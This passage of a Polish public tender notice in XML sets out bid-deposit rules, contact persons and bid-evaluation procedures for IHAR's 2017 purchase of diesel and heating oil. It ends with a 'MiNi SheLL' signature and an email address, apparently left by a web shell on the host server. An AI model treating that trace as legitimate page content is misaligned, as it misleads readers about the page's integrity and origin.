8.4	Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału razem z ofertą w osobnej kopercie.  
8.5	Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winny zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego, wzywające do zapłaty kwoty wadium zgodnie z warunkami SIWZ, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta – poręczyciela.
8.6	Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy z adnotacją podaną poniżej:
Nr rachunku: B.G.Ż. S.A. I O. Warszawa Numer 31203000451110000000315670 z wpisem:
Wadium – IHAR - PIBZD. PN. 02/2017 (Zakup i dostawa oleju napędowego i opałowego).
8.7	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.8	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca  wadium   niezwłocznie po zawarciu umowy. 
8.9	Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert, został wykluczony z postępowania lub oferta została odrzucona.
8.10 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została  wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
Powyższe okoliczności, o których mowa w muszą być jednoznacznie określone w treści gwarancji wnoszonej w formie innej niż w pieniądzu.
8.11 Niewniesienie wadium: 
a)	do upływu terminu składania ofert, 
b)	na przedłużony okres związania ofertą, 
c)	przez Wykonawcę, którego oferta została wybrana jako najkorzystniejsza w wyniku rozstrzygnięcia odwołania, w terminie wyznaczonym przez Zamawiającego, skutkować będzie wykluczeniem z udziału w postępowaniu. 
8.12 Wszelkie rozliczenia związane z realizacją zamówienia publicznego, którego dotyczy niniejsza SIWZ  dokonywane są w polskich „PLN” z dokładnością do dwóch miejsc po przecinku.
8.13 W zakresie wadium obowiązują uregulowania Prawa Zamówień publicznych zawarte w art.45 i 46 Prawa zamówień publicznych. 
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Zmiana umowy może wystąpić w przypadku koniecznym, niezależnym od Zamawiającego i w zakresie wskazanym w SIWZ oraz obowiązujących przepisach.</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>10/02/2017</data_skl><godz_skl>9:30</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>20</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>7. Informacja o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń i   dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z Wykonawcami.
7.1	W postępowaniu o udzielenie zamówienia, wszelkie oświadczenia, wnioski, zawiadomienia, informacje  oraz pytania Zamawiający i Wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną na kontakt podany w punkcie 1 niniejszej specyfikacji. 
7.2	Każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień oraz innych informacji przekazanych za pomocą faksu lub poczty elektronicznej. 
7.3	W przypadku przekazywania oświadczeń, wniosków, zawiadomień, informacji  oraz pytań drogą elektroniczną Wykonawca zobowiązany jest oryginał tych dokumentów niezwłocznie przesłać pocztą na wskazany powyżej adres.
7.4	W przypadku gdy przesłane za pomocą faksu oświadczenia, wnioski, zawiadomienia oraz inne dokumenty w niniejszym postępowaniu będą nieczytelne, Zawiadamiający może się zwrócić o ponowne ich przeslanie za pomocą innego z wymienionych w SIWZ sposobów.
7.5	Osobą uprawnioną do porozumiewania się z Wykonawcami jest:
             w sprawach merytorycznych dotyczących przedmiotu zamówienia: 
             Zbigniew Bogucki – dostawy w Radzikowie (pn. – pt. w godzinach od 8:00 do 14:00),
             tel. fax: (22) 725 37 15 lub tel. kom. 601 394 245 
Mirosław Pleban – dostawy w Młochowie 
Tel. 22 725 37 15, 605 587 982
             w sprawach formalnych związanych z procedurą postępowania:
             Marek Kozłowski (pn. – pt. w godzinach od 8:00 do 14:00)
             tel. fax: (22) 725 37 15 lub tel. kom. 603 632 027 
7.6	 Wyjaśnienia treści SIWZ: 
7.6.1	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienia treści niniejszej specyfikacji istotnych warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni przed upływem terminu składania ofert, z zastrzeżeniem ppkt. 7.6.2. 
7.6.2	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający niezwłocznie udzieli wyjaśnień, jednak nie później niż 2 dni przed upływem terminu składania ofert (pkt. 11.4), pod warunkiem, że wniosek o wyjaśnienie treści SIWZ  wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, Zamawiający może udzielić wyjaśnień lub pozostawić wniosek bez rozpoznania. 
7.6.3	Ewentualna zmiana terminu składania pytań nie powoduje przesunięcia terminu, o którym mowa w (pkt.11 .4), po upływie którego Zamawiający może pozostawić wniosek o wyjaśnienie  treści specyfikacji bez rozpoznania. 
7.6.4	Zamawiający informuje, że zgodnie z art. 38 ust. 2 ustawy PZP treść zapytań wraz z wyjaśnieniami (bez ujawnienia źródła zapytania) zamieści na stronie internetowej www.zdhar.pl. Tym samym wszelkie informacje przekazywane Wykonawcom stanowią integralną część specyfikacji istotnych warunków zamówienia i dotyczą wszystkich Wykonawców biorących udział w ww. postępowaniu. Wykonawca jest zobowiązany złożyć ofertę uwzględniającą wszelkie zmiany i wyjaśnienia zawarte w informacjach dla Wykonawców
7.6.5	Zamawiający nie przewiduje zorganizowania zebrania z Wykonawcami, 
7.7	Wymagania w toku badania i oceny ofert: 
7.7.1	Zamawiający może wezwać Wykonawców do uzupełnienia odpowiednich oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub potwierdzających spełnienie przez oferowane dostawy, usługi lub roboty budowlane, wymagań określonych przez Zamawiającego lub pełnomocnictw, jeżeli spełnione zostaną przesłanki określone w art. 26 ust. 3 Prawa zamówień publicznych.
Nieuzupełnienie oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub potwierdzających spełnienie przez oferowane dostawy, usługi lub roboty wymagań określonych przez Zamawiającego w odpowiedzi na ww. wezwanie może skutkować zatrzymaniem wadium wraz z odsetkami na mocy art. 46 ust. 4a Prawa zamówień publicznych
7.7.2Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych  ofert oraz wyjaśnień dotyczących oświadczeń lub dokumentów potwierdzających:  
- spełnienia przez Wykonawców warunków udziału w postępowaniu, 
- spełnienia przez oferowane dostawy, usługi lub roboty wymagań określonych przez Zamawiającego. 
7.7.2	Zamawiający może zwrócić się do Wykonawcy o udzielenie wyjaśnień dotyczących powiązań w zakresie grupy kapitałowej istniejących między Wykonawcami celu ustalenia, czy zachodzą przesłanki wykluczenia Wykonawcy. Niezłożenie wyjaśnień spowoduje wykluczenie Wykonawcy z udziału w postępowaniu. 
7.7.3	Zamawiający poprawia w ofercie oczywiste omyłki pisarskie oraz oczywiste omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona. 
7.7.4	Zamawiający poprawia w ofercie inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodujące istotnych zmian w ofercie, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona. Oferta Wykonawcy, który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie takiej omyłki, podlega odrzuceniu. 
7.7.5	Zawiadamiający w celu ustalenia, czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie w wyznaczonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny. 
7.7.6	Zamawiający odrzuca ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli ocena wyjaśnień potwierdza, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 
</IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie /><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com